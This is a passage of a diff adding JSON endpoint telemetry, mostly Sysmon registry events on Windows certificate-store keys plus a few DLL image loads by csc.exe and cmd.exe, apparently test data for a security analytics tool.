"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\SysWOW64\\version.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 